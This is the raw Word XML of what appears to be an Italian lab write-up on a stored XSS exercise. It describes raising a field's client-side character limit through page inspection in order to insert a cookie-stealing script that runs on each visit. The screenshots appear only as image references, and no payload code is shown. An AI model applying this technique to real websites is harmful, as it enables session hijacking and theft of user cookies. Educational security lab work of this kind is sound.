    <w:p w14:paraId="427CE0A8" w14:textId="1F5A4CB3" w:rsidR="00387BA8" w:rsidRDefault="00387BA8" w:rsidP="00FD5938">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="663D2BB8" wp14:editId="1E17F3BC">
            <wp:extent cx="6120130" cy="3592830"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1758683371" name="Immagine 5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83371" name="Immagine 5" descr="Immagine che contiene testo, schermata, software, Software multimediale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8270" w14:textId="022CA804" w:rsidR="00E639EA" w:rsidRDefault="00E639EA" w:rsidP="00FD5938"/>
    <w:p w14:paraId="44D9B650" w14:textId="77777777" w:rsidR="00BE297B" w:rsidRDefault="00BE297B" w:rsidP="00FD5938"/>
    <w:p w14:paraId="6E78F3B8" w14:textId="21F601A5" w:rsidR="00E639EA" w:rsidRDefault="00385084" w:rsidP="00FD5938">
      <w:r>
        <w:t>Ogni script pensato per rubare e indirizzare i cookie sforava i 50 caratteri.</w:t>
      </w:r>
      <w:r w:rsidR="009F7463">
        <w:t xml:space="preserve"> Così</w:t>
      </w:r>
      <w:r w:rsidR="00316B3C">
        <w:t>, ispezionando la pagina,</w:t>
      </w:r>
      <w:r w:rsidR="009F7463">
        <w:t xml:space="preserve"> si è deciso di risolvere il problema aumentando direttamente il numero di caratteri in</w:t>
      </w:r>
      <w:r w:rsidR="00EC4417">
        <w:t>seribili</w:t>
      </w:r>
      <w:r w:rsidR="00316B3C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD10426" w14:textId="297184A8" w:rsidR="00E639EA" w:rsidRDefault="00E639EA" w:rsidP="00FD5938">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02FAF002" wp14:editId="54A603A2">
            <wp:extent cx="5692633" cy="1920406"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="1389335581" name="Immagine 6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35581" name="Immagine 6" descr="Immagine che contiene testo, schermata, software, Software multimedial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DB20" w14:textId="77777777" w:rsidR="00316B3C" w:rsidRDefault="00316B3C" w:rsidP="00FD5938"/>
    <w:p w14:paraId="3E849A97" w14:textId="4DA95C0B" w:rsidR="00316B3C" w:rsidRDefault="00316B3C" w:rsidP="00FD5938">
      <w:r>
        <w:t>Segue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A438C2" w14:textId="52A0A0A7" w:rsidR="00316B3C" w:rsidRDefault="00316B3C" w:rsidP="00FD5938">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Grazie a questo è stato possibile inserire nel messaggio lo script utile a rubare</w:t>
      </w:r>
      <w:r w:rsidR="00D43D56">
        <w:t xml:space="preserve"> e indirizzare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> i cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2CAEE7" w14:textId="39AA2AAD" w:rsidR="00316B3C" w:rsidRDefault="00316B3C" w:rsidP="00FD5938">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50341400" wp14:editId="612D3F1A">
            <wp:extent cx="5334462" cy="2270957"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="997859055" name="Immagine 7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59055" name="Immagine 7" descr="Immagine che contiene testo, schermata, Carattere, software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8B90" w14:textId="77777777" w:rsidR="00BE297B" w:rsidRDefault="00BE297B" w:rsidP="00FD5938"/>
    <w:p w14:paraId="6129FDD0" w14:textId="77777777" w:rsidR="00BE297B" w:rsidRDefault="00BE297B" w:rsidP="00FD5938"/>
    <w:p w14:paraId="092B84BB" w14:textId="0B845505" w:rsidR="008A081F" w:rsidRDefault="00407093" w:rsidP="00FD5938">
      <w:r>
        <w:t xml:space="preserve">Ogni </w:t>
      </w:r>
      <w:r w:rsidR="008A081F">
        <w:t xml:space="preserve">volta che si </w:t>
      </w:r>
      <w:r w:rsidR="009F3DE5">
        <w:t xml:space="preserve">è in ascolto e si </w:t>
      </w:r>
      <w:r w:rsidR="008A081F">
        <w:t>accede alla pagina “</w:t>
      </w:r>
      <w:r w:rsidR="009F3DE5">
        <w:t xml:space="preserve">XSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009F3DE5">
        <w:t>stored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009F3DE5">
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">il codice salvato </w:t>
      </w:r>
      <w:r w:rsidR="009F3DE5">
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:t>iene</w:t>
      </w:r>
      <w:r w:rsidR="009F3DE5">
        <w:t xml:space="preserve"> eseguito</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7078E7" w14:textId="340CF8C6" w:rsidR="00BE297B" w:rsidRDefault="00BE297B" w:rsidP="00FD5938">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70B09A9E" wp14:editId="3FBC0FEF">
            <wp:extent cx="6120130" cy="2819400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="984940959" name="Immagine 8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40959" name="Immagine 8" descr="Immagine che contiene testo, schermata, software, Pagina Web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A93A" w14:textId="77777777" w:rsidR="00316B3C" w:rsidRPr="00D81314" w:rsidRDefault="00316B3C" w:rsidP="00FD5938"/>
    <w:sectPr w:rsidR="00316B3C" w:rsidRPr="00D813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B790F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E8A8F6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2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A2"/>
    <w:rsid w:val="000109F0"/>
    <w:rsid w:val="000B2607"/>
    <w:rsid w:val="000B33AF"/>
    <w:rsid w:val="000B4337"/>
    <w:rsid w:val="00136966"/>
    <w:rsid w:val="0015238B"/>
    <w:rsid w:val="001B66F5"/>
    <w:rsid w:val="001D27E1"/>
    <w:rsid w:val="001D5F88"/>
    <w:rsid w:val="0020422D"/>
    <w:rsid w:val="0023211B"/>
    <w:rsid w:val="002328EB"/>
    <w:rsid w:val="0023695A"/>
    <w:rsid w:val="002B7C91"/>
    <w:rsid w:val="002E179D"/>
    <w:rsid w:val="003054A2"/>
    <w:rsid w:val="00316B3C"/>
    <w:rsid w:val="00326B01"/>
    <w:rsid w:val="00385084"/>
    <w:rsid w:val="00387BA8"/>
    <w:rsid w:val="003B4CB9"/>
    <w:rsid w:val="003F47FC"/>
    <w:rsid w:val="00407093"/>
    <w:rsid w:val="00412E29"/>
    <w:rsid w:val="00435CA8"/>
    <w:rsid w:val="004644B2"/>
    <w:rsid w:val="004B1D29"/>
    <w:rsid w:val="004B46DD"/>
    <w:rsid w:val="004C2D05"/>
    <w:rsid w:val="004F423E"/>
    <w:rsid w:val="0051489D"/>
    <w:rsid w:val="0052796A"/>
    <w:rsid w:val="0053523D"/>
    <w:rsid w:val="005354A9"/>
    <w:rsid w:val="005774D9"/>
    <w:rsid w:val="005915E8"/>
    <w:rsid w:val="006467D6"/>
    <w:rsid w:val="0067577D"/>
    <w:rsid w:val="006C27EB"/>
    <w:rsid w:val="00700AEF"/>
    <w:rsid w:val="00707349"/>
    <w:rsid w:val="00722603"/>
    <w:rsid w:val="00755D67"/>
    <w:rsid w:val="007D4F3E"/>
    <w:rsid w:val="007D57EE"/>
    <w:rsid w:val="007F4C73"/>
    <w:rsid w:val="007F4D5B"/>
    <w:rsid w:val="0082153E"/>
    <w:rsid w:val="00837977"/>
    <w:rsid w:val="00851F43"/>
    <w:rsid w:val="00893C75"/>
    <w:rsid w:val="008A081F"/>
    <w:rsid w:val="008C4AA8"/>
    <w:rsid w:val="009164DD"/>
    <w:rsid w:val="0092149E"/>
    <w:rsid w:val="0092391B"/>
    <w:rsid w:val="009447C8"/>
    <w:rsid w:val="00955483"/>
    <w:rsid w:val="0096073B"/>
    <w:rsid w:val="00975766"/>
    <w:rsid w:val="009C4E74"/>
    <w:rsid w:val="009F0B47"/>
    <w:rsid w:val="009F3DE5"/>
    <w:rsid w:val="009F7463"/>
    <w:rsid w:val="00A45FD7"/>
    <w:rsid w:val="00A466A3"/>
    <w:rsid w:val="00A469AE"/>
    <w:rsid w:val="00A47E9F"/>
    <w:rsid w:val="00A61E98"/>
    <w:rsid w:val="00A643F8"/>
    <w:rsid w:val="00AB122C"/>
    <w:rsid w:val="00AB173D"/>
    <w:rsid w:val="00AB6425"/>
    <w:rsid w:val="00B07EE3"/>
    <w:rsid w:val="00B3542C"/>
    <w:rsid w:val="00B4642F"/>
    <w:rsid w:val="00B533B9"/>
    <w:rsid w:val="00B56533"/>
    <w:rsid w:val="00B87117"/>
    <w:rsid w:val="00B93844"/>
    <w:rsid w:val="00BC1420"/>
    <w:rsid w:val="00BE297B"/>
    <w:rsid w:val="00C04F36"/>
    <w:rsid w:val="00C43E69"/>
    <w:rsid w:val="00D16ABF"/>
    <w:rsid w:val="00D43770"/>
    <w:rsid w:val="00D43D56"/>
    <w:rsid w:val="00D53CF5"/>
    <w:rsid w:val="00D62B73"/>
    <w:rsid w:val="00D77C33"/>
    <w:rsid w:val="00D81314"/>
    <w:rsid w:val="00D90EB4"/>
    <w:rsid w:val="00DE76F6"/>
    <w:rsid w:val="00E26DEC"/>
    <w:rsid w:val="00E639EA"/>
    <w:rsid w:val="00E8078D"/>
    <w:rsid w:val="00E97F3B"/>
    <w:rsid w:val="00EB7CE1"/>
    <w:rsid w:val="00EC4417"/>
    <w:rsid w:val="00F018D5"/>
    <w:rsid w:val="00F15ED1"/>
    <w:rsid w:val="00F74E09"/>
    <w:rsid w:val="00F81284"/>
    <w:rsid w:val="00F93089"/>
    <w:rsid w:val="00FB1E36"/>
    <w:rsid w:val="00FD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53323"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C85A714F-2E78-41BE-AEEF-99715666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D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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-19T15:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-19T15:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>